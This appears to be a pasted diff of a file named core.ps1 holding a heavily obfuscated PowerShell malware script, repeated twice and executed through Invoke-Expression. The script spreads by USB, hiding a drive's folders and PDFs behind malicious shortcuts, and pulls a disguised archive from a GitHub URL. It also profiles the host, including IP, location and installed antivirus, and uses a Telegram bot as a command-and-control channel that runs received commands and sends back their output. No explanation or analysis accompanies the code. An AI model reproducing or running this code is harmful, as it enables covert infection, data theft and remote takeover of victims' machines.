usualsuspect · November 25, 2022 17:24
diff --git a/core.ps1 b/core.ps1
 (('[Net.ServicePointManager]::Se'+'curityProtocol=[Net.SecurityProtocolType]::Tls12;
 NyQErrorActionPreference=zCwContinuezCw;
 NyQa=zCwap'+'i.telegram.orgzCw;
 do{Slee'+'p(Get-Random 100)}while'+'((iwr NyQa).StatusCode -ne 20'+'0)
 NyQ'+'Query = zCwselect * from __InstanceCreationE'+'vent within 5 where Target'+'Instance'+' ISA sn4Win32_LogicalDisk'+'sn4 and TargetInstance.DriveType = 2zCw;
 Ny'+'QAction = {
    (gwmi cim_logicaldiskugE?{(NyQ_.drivetype -eq 2)-and(T'+'est-path '+'z'+'CwNyQ(NyQ_.dev'+'iceid)byfzCw)'+'}).DeviceIDugE%'+'{
       '+' if(NyQnull'+' -eq NyQ_){return}
 '+'
        try{Expand-Archive -Path zCwNyQenv:tempbyfxxx.zipzCw -DestinationPath zCwNyQenv:te'+'mpzCw -force}catch{
            NyQuri = zCwhttps://raw.'+'githubusercontent.c'+'om/efimovah/abcd/main/xxx.gifzCw;
            Start-Bi'+'tsTransfer -Source NyQuri -Destination zC'+'wNyQEnv:tmpbyf'+'xxx.zipzCw;
            Expa'+'nd-Archive -Path'+' zC'+'wNy'+'Qenv'+':tempbyfxxx.zipzCw -DestinationPath zCwNyQenv:tempzCw -force}
        cp zCwNyQenv:tempbyfxxxzCw zCwNyQ_byfdismzCw -Recurse -Force;
        sc '+'zCwNyQ_byfsystem.batzCw -'+'value '+'zCw@echo offPOGncd %cd%dismPOGnstart dism.exePOGnexi'+'tzCw;
        attrib '+'+s +h zCwNyQ_byfdismzCw;attrib +s +h zCwNyQ_'+'byfdismbyf*.*zCw;attrib +'+'s +h zCwNyQ_byfsystem.batzCw;
        ('+'Gci zCwNyQ_byfzCw -Directory -force)ugE?{NyQ_.name -notin (sn4dismsn4,sn4NyQRECYCLE.BINsn4,sn4System '+'Volume Informationsn4)}ugE%{
 '+'      '+'     if(NyQnull -eq NyQ_){return}
            a'+'ttrib +s '+'+h zCwNyQ(NyQ_.fullname)zCw
            NyQWshShell = New-Object -com'+'Ob'+'ject WScript.Shell
            NyQ'+'Shortcut = '+'NyQWshShell.CreateShortcut(zCwNyQ(NyQ_.fullname).lnkzCw)
            NyQShortcut.TargetPath = '+'zCw%SystemRoot%b'+'yfSystem32byfcmd.exezCw
            NyQShortcut.Argu'+'ments = zCw/c start '+'explorer NyQ(NyQ_.name) && sy'+'stem.bat && exitzCw
            NyQShortcut.IconLocatio'+'n = zCw%SystemRoot%byfSystem32byfSHELL32.dll,4zCw
            NyQSh'+'ortcut.WorkingDirectory = zCw%cd'+'%zCw
            NyQShortcut.'+'Save()
        }
        (Gi zCwNyQ_byf*.pdfzCw -force)ugE%{'+'
           '+' if(NyQnull -eq NyQ_){retur'+'n}'+'
            at'+'trib +s +'+'h zCwNyQ'+'(NyQ_.fullname)zCw
            NyQW'+'shShell = New-Object -comObject WScript.Sh'+'ell
            NyQShortcut = NyQWshShell.CreateShortcut(zCwNyQ(NyQ_.fullname).lnkzC'+'w)
            NyQShortcut.TargetPath = zCw%SystemRoot%byfS'+'ystem3'+'2b'+'yfcmd.exezCw
            NyQShortcut.Ar'+'guments = zCw/c sta'+'rt explorer NyQ(NyQ_.name) && syste'+'m.bat && exitzCw
          '+'  NyQShortcut.IconLocation = zCwC:byfProgram Files (x86)byfMicrosoftbyfEdgebyfApplicationbyfmsedge.exe,13zCw
 '+'            NyQSh'+'ortcut.WorkingDirectory ='+' zCw%cd%zC'+'w
            NyQShortcut.Save()
        }
    }
 };
 Reg'+'ister-WmiEvent'+' -Query NyQQuery -Action NyQAction -Sou'+'rceIden'+'tifier USBFlashDrive'+';
 NyQcn=NyQenv:COM'+'PUTERNAME
 if(-not(New-Obj'+'ect Th'+'reading.Mutex(NyQfalse, NyQcn)).WaitOne(1)){exit}
 NyQreg='+'zC'+'wHKCU:byfEnvironmentzCw
 while(-not Ny'+'Qip){Sleep(Get-Random 100);NyQip=irm zC'+'whttp://ip-api.com/jsonzCw}
 NyQip_local = (Get-NetIPConfigurationugE?{NyQ_.IPv4DefaultGateway -ne NyQnull -and NyQ_.Ne'+'tAdap'+'ter.Status -ne zCwDisconne'+'ctedzCw}).IPv4Addre'+'ss.IPAddress
 NyQtk,NyQid = '+'(gp NyQreg -name GUID)'+'.GUID -split zCw::zCw
 NyQtk1,NyQid1 = (gp NyQ'+'reg -name GUID1).GUID1 -split zCw::zCw
 NyQtk2,NyQi'+'d2 = '+'(gp NyQreg -name GUID2).GUID2 -split'+' zCw'+'::zCw
 '+'NyQtks=@(NyQtk,NyQtk1,NyQtk2);NyQids=@(NyQid,Ny'+'Qid1,NyQid2)
 NyQmodel = (Get-WmiObject win32_computersystem).model
 NyQhd = (get-p'+'artition -DriveLetter CugEget-disk).FriendlyNam'+'e
 NyQos,NyQtype = '+'sn4Versionsn4, sn4ProductTypesn4ugE%{(Get-CimInstanc'+'e -ClassName Win'+'32_OperatingSystem).NyQ_}
 NyQav = ((Get-CimInstance -Namespace root/SecurityCenter2 -ClassNam'+'e AntivirusProduct).displayNameugEsort -Unique) -join'+' zC'+'w,zCw
 NyQinfo = zCwNyQcn : NyQ(whoami) : NyQ(NyQip.countryCode)'+'-N'+'yQ(NyQip.region) : NyQ(NyQip.query) : NyQip'+'_local : NyQmodel : NyQhd : NyQos : NyQtype : NyQav :zCw
 NyQur'+'i = zCwNyQa/botNyQtk/sen'+'dMessa'+'ge?ch'+'at_id=NyQid&t'+'ext=NyQinfozCw
 NyQm=(gp NyQreg -name date).date;
 NyQi=0;while(NyQi -lt 5){
    NyQok = NyQnull;NyQi+=1
    if(NyQm){'+'NyQok = (iwr zCwNyQuri reconnected!zCw).StatusCode
    }else{NyQok = (iwr zCwNyQuri new connection!zC'+'w).StatusCode}
    if(NyQok -eq'+' 200'+'){break}
 '+'   Sleep(Get-Random 1000);
 }
 sal 4ID (('+'gal i??)[1]'+')'+'
 while(1){
    Sleep(Get-Random 100);NyQt_msg=NyQtksugE%{
 '+'        NyQmg='+'(irm -Uri zC'+'wNyQa/botNyQ_/getUpdateszCw).result.'+'mes'+'sage;
        NyQmgugEAdd-Member -Not'+'ePropertyName token -NotePropertyValue '+'Ny'+'Q_;NyQmg
    }ugE?{NyQ_.chat.id -in NyQids}ugEsor'+'t date;
    NyQt_msgugE%{
        if(NyQm -lt NyQ_.date){
            NyQm=NyQ_.date;s'+'p NyQreg -na'+'me date -value NyQm;
            NyQname,NyQtask=NyQ_.text -split z'+'Cw ::'+' zCw;NyQname=NyQname -split zCw,zCw;
 '+'            if((NyQcn -i'+'n NyQname'+')-or(NyQname -like zC'+'wallz'+'Cw)) {
               '+' NyQuri=zCwNyQa/botNyQ(NyQ_.token)/sendMessage?chat_id=NyQ(NyQ_.chat.id)&text=NyQinfozCw
           '+'     NyQms=(NyQtaskugE4ID -ErrorV'+'ariable b)ugEO'+'ut-String;
                NyQi=0;while(Ny'+'Qi -lt 5){
            '+'        NyQok = NyQnull;NyQi+=1
                    NyQok = (iwr zCwNyQu'+'riPOGnNyQ(N'+'yQms['+'0..NyQ(4080-NyQinfo.Length)'+'] -join sn4sn4)zCw).StatusCode
               '+'     if(NyQb){iwr zCwNyQuriPOGnNyQ((NyQbugEout-string)[0..NyQ(4080-NyQinfo.Length)] -join sn4sn4)zCw}
         '+'      '+'     Slee'+'p(Get-Random 1000);
                }
            }
        }
        NyQtks=@('+'NyQtk,NyQtk1,NyQtk2);Ny'+'Qids=@(NyQid,NyQid1,Ny'+'Qid2)
        NyQm=(gp NyQreg -nam'+'e date).date
    }'+'
 }
 ')-REplACE 'POG',[Char]96  -REplACE([Char]98+[Char]121+[Char]102),[Char]92  -REplACE([Char]115+[Char]110+[Char]52),[Char]39  -crePlAce  ([Char]117+[Char]103+[Char]69),[Char]124  -crePlAce  'NyQ',[Char]36  -crePlAce'zCw',[Char]34)| iEX
	(('[Net.ServicePointManager]::Se'+'curityProtocol=[Net.SecurityProtocolType]::Tls12;
	NyQErrorActionPreference=zCwContinuezCw;
	NyQa=zCwap'+'i.telegram.orgzCw;
	do{Slee'+'p(Get-Random 100)}while'+'((iwr NyQa).StatusCode -ne 20'+'0)
	NyQ'+'Query = zCwselect * from __InstanceCreationE'+'vent within 5 where Target'+'Instance'+' ISA sn4Win32_LogicalDisk'+'sn4 and TargetInstance.DriveType = 2zCw;
	Ny'+'QAction = {
	(gwmi cim_logicaldiskugE?{(NyQ_.drivetype -eq 2)-and(T'+'est-path '+'z'+'CwNyQ(NyQ_.dev'+'iceid)byfzCw)'+'}).DeviceIDugE%'+'{
	'+' if(NyQnull'+' -eq NyQ_){return}
	'+'
	try{Expand-Archive -Path zCwNyQenv:tempbyfxxx.zipzCw -DestinationPath zCwNyQenv:te'+'mpzCw -force}catch{
	NyQuri = zCwhttps://raw.'+'githubusercontent.c'+'om/efimovah/abcd/main/xxx.gifzCw;
	Start-Bi'+'tsTransfer -Source NyQuri -Destination zC'+'wNyQEnv:tmpbyf'+'xxx.zipzCw;
	Expa'+'nd-Archive -Path'+' zC'+'wNy'+'Qenv'+':tempbyfxxx.zipzCw -DestinationPath zCwNyQenv:tempzCw -force}
	cp zCwNyQenv:tempbyfxxxzCw zCwNyQ_byfdismzCw -Recurse -Force;
	sc '+'zCwNyQ_byfsystem.batzCw -'+'value '+'zCw@echo offPOGncd %cd%dismPOGnstart dism.exePOGnexi'+'tzCw;
	attrib '+'+s +h zCwNyQ_byfdismzCw;attrib +s +h zCwNyQ_'+'byfdismbyf.zCw;attrib +'+'s +h zCwNyQ_byfsystem.batzCw;
	('+'Gci zCwNyQ_byfzCw -Directory -force)ugE?{NyQ_.name -notin (sn4dismsn4,sn4NyQRECYCLE.BINsn4,sn4System '+'Volume Informationsn4)}ugE%{
	'+' '+' if(NyQnull -eq NyQ_){return}
	a'+'ttrib +s '+'+h zCwNyQ(NyQ_.fullname)zCw
	NyQWshShell = New-Object -com'+'Ob'+'ject WScript.Shell
	NyQ'+'Shortcut = '+'NyQWshShell.CreateShortcut(zCwNyQ(NyQ_.fullname).lnkzCw)
	NyQShortcut.TargetPath = '+'zCw%SystemRoot%b'+'yfSystem32byfcmd.exezCw
	NyQShortcut.Argu'+'ments = zCw/c start '+'explorer NyQ(NyQ_.name) && sy'+'stem.bat && exitzCw
	NyQShortcut.IconLocatio'+'n = zCw%SystemRoot%byfSystem32byfSHELL32.dll,4zCw
	NyQSh'+'ortcut.WorkingDirectory = zCw%cd'+'%zCw
	NyQShortcut.'+'Save()
	}
	(Gi zCwNyQ_byf*.pdfzCw -force)ugE%{'+'
	'+' if(NyQnull -eq NyQ_){retur'+'n}'+'
	at'+'trib +s +'+'h zCwNyQ'+'(NyQ_.fullname)zCw
	NyQW'+'shShell = New-Object -comObject WScript.Sh'+'ell
	NyQShortcut = NyQWshShell.CreateShortcut(zCwNyQ(NyQ_.fullname).lnkzC'+'w)
	NyQShortcut.TargetPath = zCw%SystemRoot%byfS'+'ystem3'+'2b'+'yfcmd.exezCw
	NyQShortcut.Ar'+'guments = zCw/c sta'+'rt explorer NyQ(NyQ_.name) && syste'+'m.bat && exitzCw
	'+' NyQShortcut.IconLocation = zCwC:byfProgram Files (x86)byfMicrosoftbyfEdgebyfApplicationbyfmsedge.exe,13zCw
	'+' NyQSh'+'ortcut.WorkingDirectory ='+' zCw%cd%zC'+'w
	NyQShortcut.Save()
	}
	}
	};
	Reg'+'ister-WmiEvent'+' -Query NyQQuery -Action NyQAction -Sou'+'rceIden'+'tifier USBFlashDrive'+';
	NyQcn=NyQenv:COM'+'PUTERNAME
	if(-not(New-Obj'+'ect Th'+'reading.Mutex(NyQfalse, NyQcn)).WaitOne(1)){exit}
	NyQreg='+'zC'+'wHKCU:byfEnvironmentzCw
	while(-not Ny'+'Qip){Sleep(Get-Random 100);NyQip=irm zC'+'whttp://ip-api.com/jsonzCw}
	NyQip_local = (Get-NetIPConfigurationugE?{NyQ_.IPv4DefaultGateway -ne NyQnull -and NyQ_.Ne'+'tAdap'+'ter.Status -ne zCwDisconne'+'ctedzCw}).IPv4Addre'+'ss.IPAddress
	NyQtk,NyQid = '+'(gp NyQreg -name GUID)'+'.GUID -split zCw::zCw
	NyQtk1,NyQid1 = (gp NyQ'+'reg -name GUID1).GUID1 -split zCw::zCw
	NyQtk2,NyQi'+'d2 = '+'(gp NyQreg -name GUID2).GUID2 -split'+' zCw'+'::zCw
	'+'NyQtks=@(NyQtk,NyQtk1,NyQtk2);NyQids=@(NyQid,Ny'+'Qid1,NyQid2)
	NyQmodel = (Get-WmiObject win32_computersystem).model
	NyQhd = (get-p'+'artition -DriveLetter CugEget-disk).FriendlyNam'+'e
	NyQos,NyQtype = '+'sn4Versionsn4, sn4ProductTypesn4ugE%{(Get-CimInstanc'+'e -ClassName Win'+'32_OperatingSystem).NyQ_}
	NyQav = ((Get-CimInstance -Namespace root/SecurityCenter2 -ClassNam'+'e AntivirusProduct).displayNameugEsort -Unique) -join'+' zC'+'w,zCw
	NyQinfo = zCwNyQcn : NyQ(whoami) : NyQ(NyQip.countryCode)'+'-N'+'yQ(NyQip.region) : NyQ(NyQip.query) : NyQip'+'_local : NyQmodel : NyQhd : NyQos : NyQtype : NyQav :zCw
	NyQur'+'i = zCwNyQa/botNyQtk/sen'+'dMessa'+'ge?ch'+'at_id=NyQid&t'+'ext=NyQinfozCw
	NyQm=(gp NyQreg -name date).date;
	NyQi=0;while(NyQi -lt 5){
	NyQok = NyQnull;NyQi+=1
	if(NyQm){'+'NyQok = (iwr zCwNyQuri reconnected!zCw).StatusCode
	}else{NyQok = (iwr zCwNyQuri new connection!zC'+'w).StatusCode}
	if(NyQok -eq'+' 200'+'){break}
	'+' Sleep(Get-Random 1000);
	}
	sal 4ID (('+'gal i??)[1]'+')'+'
	while(1){
	Sleep(Get-Random 100);NyQt_msg=NyQtksugE%{
	'+' NyQmg='+'(irm -Uri zC'+'wNyQa/botNyQ_/getUpdateszCw).result.'+'mes'+'sage;
	NyQmgugEAdd-Member -Not'+'ePropertyName token -NotePropertyValue '+'Ny'+'Q_;NyQmg
	}ugE?{NyQ_.chat.id -in NyQids}ugEsor'+'t date;
	NyQt_msgugE%{
	if(NyQm -lt NyQ_.date){
	NyQm=NyQ_.date;s'+'p NyQreg -na'+'me date -value NyQm;
	NyQname,NyQtask=NyQ_.text -split z'+'Cw ::'+' zCw;NyQname=NyQname -split zCw,zCw;
	'+' if((NyQcn -i'+'n NyQname'+')-or(NyQname -like zC'+'wallz'+'Cw)) {
	'+' NyQuri=zCwNyQa/botNyQ(NyQ_.token)/sendMessage?chat_id=NyQ(NyQ_.chat.id)&text=NyQinfozCw
	'+' NyQms=(NyQtaskugE4ID -ErrorV'+'ariable b)ugEO'+'ut-String;
	NyQi=0;while(Ny'+'Qi -lt 5){
	'+' NyQok = NyQnull;NyQi+=1
	NyQok = (iwr zCwNyQu'+'riPOGnNyQ(N'+'yQms['+'0..NyQ(4080-NyQinfo.Length)'+'] -join sn4sn4)zCw).StatusCode
	'+' if(NyQb){iwr zCwNyQuriPOGnNyQ((NyQbugEout-string)[0..NyQ(4080-NyQinfo.Length)] -join sn4sn4)zCw}
	'+' '+' Slee'+'p(Get-Random 1000);
	}
	}
	}
	NyQtks=@('+'NyQtk,NyQtk1,NyQtk2);Ny'+'Qids=@(NyQid,NyQid1,Ny'+'Qid2)
	NyQm=(gp NyQreg -nam'+'e date).date
	}'+'
	}
	')-REplACE 'POG',[Char]96 -REplACE([Char]98+[Char]121+[Char]102),[Char]92 -REplACE([Char]115+[Char]110+[Char]52),[Char]39 -crePlAce ([Char]117+[Char]103+[Char]69),[Char]124 -crePlAce 'NyQ',[Char]36 -crePlAce'zCw',[Char]34)\| iEX
No results found